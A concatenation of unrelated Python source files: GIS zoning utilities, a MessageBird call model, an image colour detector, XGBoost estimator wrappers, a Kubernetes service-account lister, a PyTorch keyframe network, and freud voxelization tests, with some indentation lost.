From a given GeoDataFrame layer and a shapely 2D geometry buffer, computes the coverage layer,
i.e. the GeoDataFrame of layer's entities included in the geometry buffer.
Inputs:
- layer: a GeoDataFrame object
- buffer: a shapely Polygon or MultiPolygon
    - extensive_cols: a subset of columns whose values are extensive and have to be recomputed
      for the new layer (for instance the population of the zone)
Outputs:
a GeoDataFrame with the same columns as the input layer, but different geometry and extensive_cols
"""
    # Intersect each entity of the layer with the buffer
layer_in_buffer = layer.copy()
layer_in_buffer['geometry_intersect'] = layer_in_buffer.intersection(buffer)
# Explode the multipolygons in polygons
layer_in_buffer['geometries'] = layer_in_buffer['geometry_intersect'].apply(
lambda x: x.geoms if x.type == 'MultiPolygon' else [x]
)
layer_in_buffer_exploded = pandas_utils.df_explode(layer_in_buffer, 'geometries')
# Compute intersection area
layer_in_buffer_exploded['area_intersected'] = gpd.GeoSeries(layer_in_buffer_exploded['geometries']).area
# Drop row with null areas
layer_in_buffer_exploded.drop(
layer_in_buffer_exploded[layer_in_buffer_exploded['area_intersected'] == 0].index,
inplace=True
)
# Recompute extensive columns values
    for col in extensive_cols:
        layer_in_buffer_exploded[col] = layer_in_buffer_exploded.apply(
            lambda x: x[col] * x['geometries'].area / x['geometry'].area, axis=1
        )
    layer_in_buffer_exploded.drop(['geometry', 'geometry_intersect', 'area_intersected'], axis=1, inplace=True)
layer_in_buffer_exploded.rename(columns={'geometries': 'geometry'}, inplace=True)
layer_in_buffer_exploded = gpd.GeoDataFrame(layer_in_buffer_exploded)
return layer_in_buffer_exploded
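# A minimal usage sketch (hypothetical inputs): clip a zoning GeoDataFrame that
# carries a 'population' column to a 1 km disc; population is rescaled by the
# share of each zone's area that falls inside the disc.
def _coverage_example(zones):
    from shapely.geometry import Point
    disc = Point(0, 0).buffer(1000)
    return compute_coverage_layer(zones, disc, extensive_cols=['population'])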
def merge_zonings(background, foreground, min_area_factor=0.01, min_area=None):
back = background.copy()
front = foreground.copy()
stencil = shapely.geometry.MultiPolygon(
list(front['geometry'])
).buffer(1e-9)
back['geometry'] = back['geometry'].apply(lambda g: g.difference(stencil))
back['geometry'] = polygons.biggest_polygons(list(back['geometry']))
back['area'] = [g.area for g in back['geometry']]
min_area = min_area if min_area else back['area'].mean() * min_area_factor
back = back.loc[back['area'] > min_area]
back['id'] = back.index
front['id'] = front.index
back['zoning'] = 'back'
front['zoning'] = 'front'
columns = ['zoning', 'id', 'geometry']
concatenated = pd.concat(
[back[columns], front[columns]]
)
df = concatenated
zones = list(df['geometry'])
clean_zones = polygons.clean_zoning(
zones,
buffer=1e-4,
fill_buffer=2e-3,
fill_gaps=False,
unite_gaps=True
)
df['geometry'] = clean_zones
return df.reset_index(drop=True)
def pool_and_geometries(pool, geometries):
done = []
while len(pool):
# start another snail
done.append(pool[0])
current = geometries[pool[0]]
pool = [p for p in pool if p not in done]
for i in range(len(pool)):
for p in pool:
if geometries[p].intersects(current):
done.append(p)
current = geometries[p]
pool = [p for p in pool if p not in done]
break
return done
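# snail_number orders zones by growing distance from a centre point, and
# pool_and_geometries walks that ordering so that each zone taken touches the
# previously taken one whenever possible; when the chain breaks, a new "snail"
# restarts from the nearest remaining zone.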
def snail_number(zones, center, distance_to='zone'):
if distance_to == 'zone':
distance_series = zones['geometry'].apply(lambda g: center.distance(g))
elif distance_to == 'centroid':
distance_series = zones['geometry'].apply(lambda g: center.distance(g.centroid))
distance_series.name = 'cluster_distance'
distance_series.sort_values(inplace=True)
geometries = zones['geometry'].to_dict()
pool = list(distance_series.index)
done = pool_and_geometries(pool, geometries)
snail = pd.Series(done)
snail.index.name = 'cluster_snail'
snail.name = 'cluster'
indexed = snail.reset_index().set_index('cluster')['cluster_snail']
return indexed.loc[zones.index] # we use zones.index to sort the result
def cluster_snail_number(zones, n_clusters=20, centre=None, buffer=10):
"""
zones: GeoSeries
"""
df = pd.DataFrame(zones).reset_index().copy()
if centre is None:
union = cascaded_union(df.geometry).buffer(buffer)
centre = union.centroid
# Snail clusterize
clusters, cluster_series = spatial.zone_clusters(df, n_clusters=n_clusters)
df['cluster'] = cluster_series
snail = snail_number(clusters, centre)
clusters['snail'] = snail
df = df.merge(snail.reset_index(), on='cluster')
    df.drop('cluster', axis=1, inplace=True)
# snail numbering within cluster
to_concat = []
for cluster in set(df['cluster_snail']):
temp_df = df.loc[df['cluster_snail'] == cluster]
temp_centre = cascaded_union(temp_df.geometry).centroid
temp_snail = snail_number(temp_df, temp_centre)
temp_df['snail'] = temp_snail
to_concat.append(temp_df)
concat = pd.concat(to_concat)
concat = concat.sort_values(['cluster_snail', 'snail']).reset_index(drop=True)
concat = concat.reset_index().rename(
columns={
'level_0': 'id',
'cluster_snail': 'cluster',
'index': 'original_index'
}
)
return concat[['cluster', 'id', 'original_index']]
def greedy_color(zoning, colors=syscolors.rainbow_shades, buffer=1e-6):
zoning = zoning.copy()
zoning['geometry'] = zoning['geometry'].apply(lambda g: g.buffer(buffer))
    # TODO change the edge construction to make it independent of neighbors
n = neighbors.neighborhood_dataframe(zoning)
edges = n[['origin', 'destination']].values
g = nx.Graph()
g.add_edges_from(edges)
d = nx.coloring.greedy_color(
g,
strategy=nx.coloring.strategy_largest_first
)
color_list = list(colors)
def index_to_color(index):
return color_list[index]
return pd.Series(d).apply(index_to_color)
########################################################################
def intersection_area(geoa, geob):
if geoa.intersects(geob):
intersection = geoa.intersection(geob)
return intersection.area
else:
return 0
def intersection_area_matrix(x_geometries, y_geometries):
array = []
for g in tqdm(x_geometries, desc=str(len(y_geometries))):
array.append(
[
intersection_area(y_geometry, g)
for y_geometry in y_geometries
]
)
return array
def intersection_area_dataframe(front, back):
front.index.name = 'front_index'
back.index.name = 'back_index'
ia_matrix = intersection_area_matrix(
list(front['geometry']),
list(back['geometry'])
)
df = pd.DataFrame(ia_matrix)
df.index = front.index
df.columns = back.index
return df
def front_distribution(front_zone, intersection_dataframe):
"""
share of the front zone in intersection with every back zone
"""
df = intersection_dataframe
intersection_series = df.loc[front_zone]
area = intersection_series.sum()
return intersection_series / area
def back_distribution(front_zone, intersection_dataframe):
    """
    share of every back zone in intersection with the front zone
    """
    df = intersection_dataframe
    intersection_series = df.loc[front_zone]
    area_series = df.sum()
    return intersection_series / area_series
def share_intensive_columns(front_zone, back, intersection_dataframe, columns):
shares = front_distribution(front_zone, intersection_dataframe)
shared_series = back[columns].apply(lambda s: s * shares)
return shared_series.sum()
def share_extensive_columns(front_zone, back, intersection_dataframe, columns):
shares = back_distribution(front_zone, intersection_dataframe)
shared_series = back[columns].apply(lambda s: s * shares)
return shared_series.sum()
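# Intensive quantities (e.g. densities) are blended with front_distribution,
# whose shares sum to 1 over the back zones covering the front zone, while
# extensive quantities (e.g. population counts) are split with
# back_distribution, so that back-zone totals are conserved across front zones.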
def concatenate_back_columns_to_front(front, back, intensive, extensive):
df = intersection_area_dataframe(front, back)
apply_series = pd.Series(front.index, index=front.index)
    intensive_dataframe = apply_series.apply(
        lambda z: share_intensive_columns(z, back, df, intensive)
    )
extensive_dataframe = apply_series.apply(
lambda z: share_extensive_columns(z, back, df, extensive)
)
return pd.concat(
[front, intensive_dataframe, extensive_dataframe],
axis=1
)
def normalize_columns(df):
column_sums = df.sum()
normalized = df / column_sums
return normalized
def share_od_extensive_columns(
od_dataframe,
intersection_dataframe,
extensive_columns
):
normalized = normalize_columns(intersection_dataframe)
# series (front, back) -> normalized_intersection
stack = normalized.stack()
origin_stack = stack.loc[stack > 0].copy()
destination_stack = stack.loc[stack > 0].copy()
origin_stack.index.names = ['front_index_origin', 'back_index_origin']
dest_index_names = ['front_index_destination', 'back_index_destination']
destination_stack.index.names = dest_index_names
# dense matrix of OD shares (origin_share * destination_share)
share_matrix = origin_stack.apply(lambda v: v * destination_stack)
share_matrix = share_matrix.sort_index(axis=0).sort_index(axis=1)
# we stack the two columns index
share_stack = share_matrix.stack(dest_index_names)
share_stack.name = 'shares'
share_stack = share_stack.reset_index()
pool = od_dataframe.rename(
columns={
'origin': 'back_index_origin',
'destination': 'back_index_destination'
}
)
    # we expand the od_dataframe by merging it on the shares
merged = pd.merge(
pool,
share_stack,
on=['back_index_origin', 'back_index_destination']
)
print(len(merged))
    # we reduce merged by grouping it by front indexes,
    # multiplying each row by its share
shared = merged.copy()
shared[extensive_columns] = shared[extensive_columns].apply(
lambda c: c * shared['shares'])
grouped = shared.groupby(
['front_index_origin', 'front_index_destination'],
)
extensive_sums = grouped[extensive_columns].sum()
extensive_sums.index.names = ['origin', 'destination']
return extensive_sums.reset_index()
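# A minimal sketch (hypothetical 'trips' column) of the OD disaggregation
# above: flows between back zones are split onto front-zone pairs in
# proportion to the product of the origin and destination area shares.
def _share_od_example(front, back, od_dataframe):
    ia = intersection_area_dataframe(front, back)
    return share_od_extensive_columns(od_dataframe, ia, ['trips'])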
|
1698261
|
from messagebird.base import Base
from messagebird.call_data import CallData
CALL_STATUS_STARTING = "starting"
CALL_STATUS_ONGOING = "ongoing"
CALL_STATUS_ENDED = "ended"
class Call(Base):
def __init__(self):
self.id = None
self._data = None
@property
def data(self):
return self._data
@data.setter
def data(self, value):
self._data = CallData().load(value[0])
def __str__(self):
return "\n".join([
'id : %s' % self.id,
'data.' + 'data.'.join(str(self._data).splitlines(True)),
])
|
1698269
|
from PIL import Image, ImageStat
import numpy as np
def is_color_image(file, thumb_size=50, MSE_cutoff=140, adjust_color_bias=True):
    try:
        pil_img = Image.open(file)
    except Exception:
        print('Couldn\'t open file %s' % file)
        return False
np_img = np.array(pil_img)
if len(np_img.shape) > 2 and np_img.shape[2] > 1:
if np.sum(np_img[:,:,1] - np_img[:,:,2]) == 0:
            print('Grayscale')
return False
else:
return False
bands = pil_img.getbands()
if bands == ('R','G','B') or bands== ('R','G','B','A'):
thumb = pil_img.resize((thumb_size,thumb_size))
SSE, bias = 0, [0,0,0]
if adjust_color_bias:
bias = ImageStat.Stat(thumb).mean[:3]
bias = [b - sum(bias)/3 for b in bias ]
for pixel in thumb.getdata():
mu = sum(pixel)/3
SSE += sum((pixel[i] - mu - bias[i])*(pixel[i] - mu - bias[i]) for i in [0,1,2])
MSE = float(SSE)/(thumb_size*thumb_size)
if MSE <= MSE_cutoff:
print "grayscale\t",
print "( MSE=",MSE,")"
return False
else:
print "Color\t\t\t",
print "( MSE=",MSE,")"
return True
elif len(bands)==1:
print "Black and white", bands
return False
else:
print "Don't know...", bands
return False
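# A minimal usage sketch (hypothetical file path) of the detector above.
def _is_color_image_example(path='photo.jpg'):
    # True for colour photos, False for grayscale or unreadable files
    return is_color_image(path)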
|
1698278
|
from __future__ import absolute_import
import inspect
import logging
import warnings
import threading
import lore.env
import lore.estimators
from lore.util import timed, before_after_callbacks
lore.env.require(
lore.dependencies.XGBOOST +
lore.dependencies.SKLEARN
)
import xgboost
logger = logging.getLogger(__name__)
class Base(object):
def __init__(self, **xgboost_params):
self.eval_metric = xgboost_params.pop('eval_metric', None)
self.scoring_metric = xgboost_params.pop('scoring_metric', None)
self.xgboost_lock = threading.RLock()
self.missing = None
super(Base, self).__init__(**xgboost_params)
def __getstate__(self):
state = super(Base, self).__getstate__()
state['xgboost_lock'] = None
return state
def __setstate__(self, state):
self.__dict__ = state
self.xgboost_lock = threading.RLock()
backward_compatible_defaults = {
'n_jobs': state.pop('nthread', -1),
'random_state': state.pop('seed', 0)
}
for key, default in backward_compatible_defaults.items():
if key not in self.__dict__.keys():
self.__dict__[key] = default
@before_after_callbacks
@timed(logging.INFO)
def fit(self, x, y, validation_x=None, validation_y=None, patience=0, verbose=None, **xgboost_kwargs):
eval_set = [(x, y)]
if validation_x is not None and validation_y is not None:
eval_set += [(validation_x, validation_y)]
        if verbose is None:
            verbose = lore.env.NAME == lore.env.DEVELOPMENT
try:
super(Base, self).fit(
X=x,
y=y,
eval_set=eval_set,
eval_metric=self.eval_metric,
verbose=verbose,
early_stopping_rounds=patience,
**xgboost_kwargs
)
except KeyboardInterrupt:
logger.warning('Caught SIGINT. Training aborted.')
evals = super(Base, self).evals_result()
if self.scoring_metric is None:
self.scoring_metric = self.eval_metric
results = {
'eval_metric': self.eval_metric,
'train': evals['validation_0'][self.eval_metric][self.best_iteration],
'best_iteration': self.best_iteration
}
if validation_x is not None:
results['validate'] = evals['validation_1'][self.eval_metric][self.best_iteration]
return results
@before_after_callbacks
@timed(logging.INFO)
def predict(self, dataframe, ntree_limit=None):
if ntree_limit is None:
ntree_limit = self.best_ntree_limit or 0
with self.xgboost_lock:
return super(Base, self).predict(dataframe, ntree_limit=ntree_limit)
@before_after_callbacks
@timed(logging.INFO)
def predict_proba(self, dataframe, ntree_limit=None):
if ntree_limit is None:
ntree_limit = self.best_ntree_limit or 0
with self.xgboost_lock:
return super(Base, self).predict_proba(dataframe, ntree_limit=ntree_limit)
@before_after_callbacks
@timed(logging.INFO)
def evaluate(self, x, y):
with self.xgboost_lock:
return float(self.get_booster().eval(xgboost.DMatrix(x, label=y)).split(':')[-1])
@before_after_callbacks
@timed(logging.INFO)
def score(self, x, y):
return self.evaluate(x, y)
class XGBoost(lore.estimators.Base):
def __init__(self, **kwargs):
frame, filename, line_number, function_name, lines, index = inspect.stack()[1]
warnings.showwarning('Please import XGBoost with "from lore.estimators.xgboost import Base"',
DeprecationWarning,
filename, line_number)
super(XGBoost, self).__init__(**kwargs)
class Regression(Base, xgboost.XGBRegressor):
def __init__(
self,
max_depth=3,
learning_rate=0.1,
n_estimators=100,
silent=True,
objective='reg:linear',
booster='gbtree',
n_jobs=-1,
gamma=0,
min_child_weight=1,
max_delta_step=0,
subsample=1,
colsample_bytree=1,
colsample_bylevel=1,
reg_alpha=0,
reg_lambda=1,
scale_pos_weight=1,
base_score=0.5,
random_state=0,
missing=None,
eval_metric='rmse',
**kwargs
):
kwargs = locals()
kwargs.pop('self')
kwargs.pop('__class__', None)
kwargs = dict(kwargs, **(kwargs.pop('kwargs', {})))
if 'random_state' not in kwargs and 'seed' in kwargs:
kwargs['random_state'] = kwargs.pop('seed')
if 'n_jobs' not in kwargs and 'nthread' in kwargs:
kwargs['n_jobs'] = kwargs.pop('nthread')
super(Regression, self).__init__(**kwargs)
class BinaryClassifier(Base, xgboost.XGBClassifier):
def __init__(
self,
max_depth=3,
learning_rate=0.1,
n_estimators=100,
silent=True,
objective='binary:logistic',
booster='gbtree',
n_jobs=-1,
gamma=0,
min_child_weight=1,
max_delta_step=0,
subsample=1,
colsample_bytree=1,
colsample_bylevel=1,
reg_alpha=0,
reg_lambda=1,
scale_pos_weight=1,
base_score=0.5,
random_state=0,
missing=None,
eval_metric='logloss',
scoring_metric='auc',
**kwargs
):
kwargs = locals()
kwargs.pop('self')
kwargs.pop('__class__', None)
kwargs = dict(kwargs, **(kwargs.pop('kwargs', {})))
if 'random_state' not in kwargs and 'seed' in kwargs:
kwargs['random_state'] = kwargs.pop('seed')
if 'n_jobs' not in kwargs and 'nthread' in kwargs:
kwargs['n_jobs'] = kwargs.pop('nthread')
super(BinaryClassifier, self).__init__(**kwargs)
@before_after_callbacks
@timed(logging.INFO)
def score(self, x, y):
import sklearn
y_pred = self.predict_proba(x)[:, 1]
return sklearn.metrics.roc_auc_score(y, y_pred)
MultiClassifier = BinaryClassifier
MutliClassifier = MultiClassifier  # keep the original misspelled alias for backwards compatibility
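# A minimal sketch (assuming xgboost/sklearn are installed and that x/y are
# arrays or DataFrames) of fitting the Regression estimator above with a
# validation split and early stopping.
def _regression_example(x_train, y_train, x_val, y_val):
    model = Regression(n_estimators=50, max_depth=4)
    results = model.fit(x_train, y_train,
                        validation_x=x_val, validation_y=y_val,
                        patience=5)
    return results['train'], results.get('validate')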
|
1698282
|
import time, os, json, sys
start_time = time.time()
from modules.main import ArgParse
from modules.logging import Logger
from modules import process as k8s
from modules.get_svc_acc import K8sSvcAcc
class ServiceAccount:
def __init__(self, namespace, logger):
self.namespace = namespace
self.logger = logger
if not self.namespace:
self.namespace = 'all'
self.k8s_object_list = K8sSvcAcc.get_svc_acc(self.namespace)
self.k8s_object = 'serviceaccount'
def get_namespaced_sa_list(self, v, l):
data = []
headers = ['NAMESPACE', 'SERVICE_ACCOUNT', 'SECRET']
for item in self.k8s_object_list.items:
for j in item.secrets:
data.append([item.metadata.namespace, item.metadata.name, j.name])
if v: print ("Total service accounts: {}".format(len(data)))
k8s.Output.print_table(data, headers, True, l)
return data
def call_all(v, namespace, l, logger):
call = ServiceAccount(namespace, logger)
call.get_namespaced_sa_list(v, l)
def main():
args = ArgParse.arg_parse()
    # args carries: verbose, namespace, logging, format, silent
logger = Logger.get_logger(args.format, args.silent)
if args:
call_all(args.verbose, args.namespace, args.logging, logger)
k8s.Output.time_taken(start_time)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(k8s.Output.RED + "[ERROR] " \
+ k8s.Output.RESET + 'Interrupted from keyboard!')
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
1698294
|
import torch
# torch.manual_seed(0)
import torch.nn as nn
from modelZoo.resNet import ResNet, Bottleneck, BasicBlock
from modelZoo.DyanOF import creatRealDictionary
from utils import generateGridPoles, gridRing,fista
import numpy as np
def load_preTrained_model(pretrained, newModel):
    """Load a pretrained resnet-X into this self-defined model.

    The modified resnet has no last two layers and only returns the feature map.
    """
pre_dict = pretrained.state_dict()
new_dict = newModel.state_dict()
pre_dict = {k: v for k, v in pre_dict.items() if k in new_dict}
new_dict.update(pre_dict)
newModel.load_state_dict(new_dict)
for param in newModel.parameters():
param.requires_grad = False
return newModel
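# A minimal sketch (assuming torchvision is available and that modelZoo's
# ResNet mirrors torchvision's constructor) of transplanting pretrained
# ResNet-18 weights into the truncated backbone and freezing them.
def _load_example():
    from torchvision import models
    pretrained = models.resnet18(pretrained=True)
    backbone = ResNet(block=BasicBlock, layers=[2, 2, 2, 2],
                      zero_init_residual=False, groups=1, width_per_group=64,
                      replace_stride_with_dilation=None, norm_layer=None)
    return load_preTrained_model(pretrained, backbone)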
class keyframeProposalNet(nn.Module):
def __init__(self, numFrame, Drr, Dtheta, gpu_id, backbone, config):
super(keyframeProposalNet, self).__init__()
self.num_frame = numFrame
self.gpu_id = gpu_id
self.backbone = backbone
self.config = config
if self.backbone == 'Resnet101':
self.modifiedResnet = ResNet(block=Bottleneck, layers=[3, 4, 23, 3], zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None) # ResNet-101
self.Conv2d = nn.Conv2d(2048, 512, kernel_size=3, stride=1, padding=1, groups=1, bias=False, dilation=1)
self.bn1 = nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
elif self.backbone == 'Resnet50':
self.modifiedResnet = ResNet(block=Bottleneck, layers=[3, 4, 6, 3], zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None) # ResNet-50
self.Conv2d = nn.Conv2d(2048, 512, kernel_size=3, stride=1, padding=1, groups=1, bias=False, dilation=1)
self.bn1 = nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
elif self.backbone == 'Resnet34':
self.modifiedResnet = ResNet(block=BasicBlock, layers=[3, 4, 6, 3], zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None) # ResNet-34
# self.layer2 = nn.Conv2d(512, 256, kernel_size=3, stride=1, padding=0, groups=1, bias=False, dilation=1)
elif self.backbone == 'Resnet18':
self.modifiedResnet = ResNet(block=BasicBlock, layers=[2, 2, 2, 2], zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
                                             norm_layer=None)  # ResNet-18
self.relu = nn.LeakyReLU(inplace=True)
        # downsample the feature map
self.layer2 = nn.Conv2d(512, 256, kernel_size=3, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn_l2 = nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer3 = nn.Conv2d(256, 128, kernel_size=3, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn_l3 = nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer4 = nn.Conv2d(128, 64, kernel_size=3, stride=1, padding=1, groups=1, bias=False, dilation=1)
self.bn_l4 = nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.Drr = nn.Parameter(Drr, requires_grad=True)
self.Dtheta = nn.Parameter(Dtheta, requires_grad=True)
        # embed information along the temporal dimension
if self.config == 'Penn':
self.fcn1 = nn.Conv2d(self.num_frame, 25, kernel_size=1, stride=2, padding=0, groups=1, bias=False, dilation=1)
self.fc = nn.Linear(2560, self.num_frame)
else:
self.fcn1 = nn.Conv2d(self.num_frame, 25, kernel_size=1, stride=1, padding=0, groups=1, bias=False,
dilation=1)
self.fc = nn.Linear(5760, self.num_frame)
self.bn2 = nn.BatchNorm2d(25, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.fcn2 = nn.Conv2d(25, 10, kernel_size=1, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn3 = nn.BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.avg_pool = nn.AdaptiveAvgPool2d((1,1))
self.sig = nn.Sigmoid()
def forward(self, x):
Dictionary = creatRealDictionary(self.num_frame, self.Drr, self.Dtheta, self.gpu_id)
imageFeature = self.modifiedResnet(x) # T X 512 X 7 X 7
        if self.backbone in ('Resnet34', 'Resnet18'):
convx = imageFeature
else:
convx = self.Conv2d(imageFeature)
convx = self.bn1(convx)
convx = self.relu(convx)
x2 = self.layer2(convx)
x2 = self.bn_l2(x2)
x2 = self.relu(x2)
x3 = self.layer3(x2)
x3 = self.bn_l3(x3)
x3 = self.relu(x3)
x4 = self.layer4(x3)
x4 = self.bn_l4(x4)
feature = self.relu(x4)
return feature, Dictionary, imageFeature
def forward2(self, feature, alpha):
x = feature.permute(1, 0, 2, 3)
x = self.fcn1(x)
x = self.bn2(x)
x = self.relu(x)
x = self.fcn2(x)
x = self.bn3(x)
x = self.relu(x)
x = x.view(1, -1)
x = self.fc(x)
out = self.sig(alpha*x)
return out
class onlineUpdate(nn.Module):
def __init__(self, FRA, PRE, T, Drr, Dtheta, gpu_id):
super(onlineUpdate, self).__init__()
self.gpu_id = gpu_id
self.Drr = Drr
self.Dtheta = Dtheta
self.numFrame = T
self.K_FPN = keyframeProposalNet(numFrame=self.numFrame, Drr=self.Drr, Dtheta=self.Dtheta, gpu_id=gpu_id,
backbone='Resnet18', config='jhmdb')
self.FRA = FRA
self.PRE = PRE
self.relu = nn.LeakyReLU(inplace=True)
self.layer0 = nn.Conv2d(512*2, 512, kernel_size=3, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn_l0 = nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer1 = nn.Conv2d(512, 256, kernel_size=3, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn_l1 = nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer2 = nn.Conv2d(256, 128, kernel_size=1, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn_l2 = nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer3 = nn.Conv2d(128, 64, kernel_size=1, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn_l3 = nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.fc = nn.Linear(1*64*3*3, 2)
def get_keylist(self, x, alpha):
feature, Dictionary, imgFeature = self.K_FPN.forward(x)
indicator = self.K_FPN.forward2(feature, alpha)
s = indicator[0, :]
key_ind = (s > 0.995).nonzero().squeeze(1)
key_list_tot = key_ind.cpu().numpy()
key_list_FRA = list(key_list_tot[np.where(key_list_tot < self.FRA)[0]]) # input key list
key_list = list(key_list_tot[np.where(key_list_tot < self.PRE+ self.FRA)[0]])
keylist_to_pred = list(set(key_list) - set(key_list_FRA))
Dict_key = Dictionary[key_list_FRA, :]
feat_key = imgFeature[key_list_FRA, :]
t, c, w, h = feat_key.shape
feat_key = feat_key.reshape(1, t, c * w * h)
sparseCode_key = fista(Dict_key, feat_key, 0.01, 100, self.gpu_id)
return sparseCode_key, Dictionary, keylist_to_pred, key_list_FRA, key_list,imgFeature
def forward(self, imgFeature, sparseCode_key, Dictionary, fraNum):
gtImgFeature = imgFeature[fraNum]
c, w, h = gtImgFeature.shape
newDictionary = torch.cat((Dictionary[0:self.FRA], Dictionary[fraNum].unsqueeze(0)))
newImgFeature = torch.matmul(newDictionary, sparseCode_key).reshape(newDictionary.shape[0], c, w, h)
predImgFeature = newImgFeature[-1]
combineFeature = torch.cat((gtImgFeature, predImgFeature)).unsqueeze(0)
x = self.layer0(combineFeature)
x = self.bn_l0(x)
x = self.relu(x)
x = self.layer1(x)
x = self.bn_l1(x)
x = self.relu(x)
x = self.layer2(x)
x = self.bn_l2(x)
x = self.relu(x)
x = self.layer3(x)
x = self.bn_l3(x)
x = self.relu(x)
x = x.view(1, -1)
out = self.fc(x)
return out
if __name__ == "__main__":
gpu_id = 2
alpha = 4 # step size for sigmoid
N = 4 * 40
P, Pall = gridRing(N)
Drr = abs(P)
Drr = torch.from_numpy(Drr).float()
Dtheta = np.angle(P)
Dtheta = torch.from_numpy(Dtheta).float()
net = keyframeProposalNet(numFrame=40,Drr=Drr, Dtheta=Dtheta, gpu_id=gpu_id, backbone='Resnet34', config='Penn')
net.cuda(gpu_id)
X = torch.randn(1, 40, 3, 224, 224).cuda(gpu_id)
for i in range(0, X.shape[0]):
x = X[i]
feature,dictionary,_ = net.forward(x)
out = net.forward2(feature, alpha)
print('check')
print('done')
|
1698306
|
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pytest
from SphereVoxelization_fft import compute_2d, compute_3d
import freud
matplotlib.use("agg")
class TestSphereVoxelization:
def test_random_points_2d(self):
width = 100
r_max = 10.0
num_points = 10
box_size = r_max * 10
box, points = freud.data.make_random_system(box_size, num_points, is2D=True)
for w in (width, (width, width), [width, width]):
vox = freud.density.SphereVoxelization(w, r_max)
# Test access
with pytest.raises(AttributeError):
vox.box
with pytest.raises(AttributeError):
vox.voxels
vox.compute(system=(box, points))
# Test access
vox.box
vox.voxels
# Verify the output dimensions are correct
assert vox.voxels.shape == (width, width)
assert np.prod(vox.voxels.shape) == np.prod(vox.width)
# Verify the calculation is correct
# here we assert that the calculations (from two different methods)
# are the same up to rounding error
fft_vox = compute_2d(box_size, width, points, r_max)
num_same = len(
np.where(np.isclose(vox.voxels - fft_vox, np.zeros(fft_vox.shape)))[0]
)
total_num = np.prod(fft_vox.shape)
assert num_same / total_num > 0.95
# Verify that the voxels are all 1's and 0's
num_zeros = len(
np.where(np.isclose(vox.voxels, np.zeros(vox.voxels.shape)))[0]
)
num_ones = len(
np.where(np.isclose(vox.voxels, np.ones(vox.voxels.shape)))[0]
)
assert num_zeros > 0
assert num_ones > 0
assert num_zeros + num_ones == np.prod(vox.voxels.shape)
def test_random_points_3d(self):
width = 100
r_max = 10.0
num_points = 10
box_size = r_max * 10
box, points = freud.data.make_random_system(box_size, num_points, is2D=False)
for w in (width, (width, width, width), [width, width, width]):
vox = freud.density.SphereVoxelization(w, r_max)
# Test access
with pytest.raises(AttributeError):
vox.box
with pytest.raises(AttributeError):
vox.voxels
vox.compute(system=(box, points))
# Test access
vox.box
vox.voxels
# Verify the output dimensions are correct
assert vox.voxels.shape == (width, width, width)
# Verify the calculation is correct
# here we assert that the calculations (from two different methods)
# are the same up to rounding error
fft_vox = compute_3d(box_size, width, points, r_max)
num_same = len(
np.where(np.isclose(vox.voxels - fft_vox, np.zeros(fft_vox.shape)))[0]
)
total_num = np.prod(fft_vox.shape)
assert num_same / total_num > 0.95
# Verify that the voxels are all 1's and 0's
num_zeros = len(
np.where(np.isclose(vox.voxels, np.zeros(vox.voxels.shape)))[0]
)
num_ones = len(
np.where(np.isclose(vox.voxels, np.ones(vox.voxels.shape)))[0]
)
assert num_zeros > 0
assert num_ones > 0
assert num_zeros + num_ones == np.prod(vox.voxels.shape)
def test_change_box_dimension(self):
width = 100
r_max = 10.0
num_points = 100
box_size = r_max * 3.1
# test that computing a 3D system after computing a 2D system will fail
box, points = freud.data.make_random_system(box_size, num_points, is2D=True)
vox = freud.density.SphereVoxelization(width, r_max)
vox.compute(system=(box, points))
test_box, test_points = freud.data.make_random_system(
box_size, num_points, is2D=False
)
with pytest.raises(ValueError):
vox.compute((test_box, test_points))
# test that computing a 2D system after computing a 3D system will fail
box, points = freud.data.make_random_system(box_size, num_points, is2D=False)
vox = freud.density.SphereVoxelization(width, r_max)
vox.compute(system=(box, points))
test_box, test_points = freud.data.make_random_system(
box_size, num_points, is2D=True
)
with pytest.raises(ValueError):
vox.compute((test_box, test_points))
def test_repr(self):
vox = freud.density.SphereVoxelization(100, 10.0)
assert str(vox) == str(eval(repr(vox)))
# Use both signatures
vox3 = freud.density.SphereVoxelization((98, 99, 100), 10.0)
assert str(vox3) == str(eval(repr(vox3)))
def test_repr_png(self):
width = 100
r_max = 10.0
num_points = 100
box_size = r_max * 3.1
box, points = freud.data.make_random_system(box_size, num_points, is2D=True)
vox = freud.density.SphereVoxelization(width, r_max)
with pytest.raises(AttributeError):
vox.plot()
assert vox._repr_png_() is None
vox.compute((box, points))
vox.plot()
vox = freud.density.SphereVoxelization(width, r_max)
test_box = freud.box.Box.cube(box_size)
vox.compute((test_box, points))
vox.plot()
assert vox._repr_png_() is None
plt.close("all")
|
1698312
|
from __future__ import absolute_import, division, print_function
# LIBTBX_SET_DISPATCHER_NAME iotbx.pdb.split_models
from libtbx.utils import Sorry, Usage, null_out
import os
import sys
master_phil = """
split_models
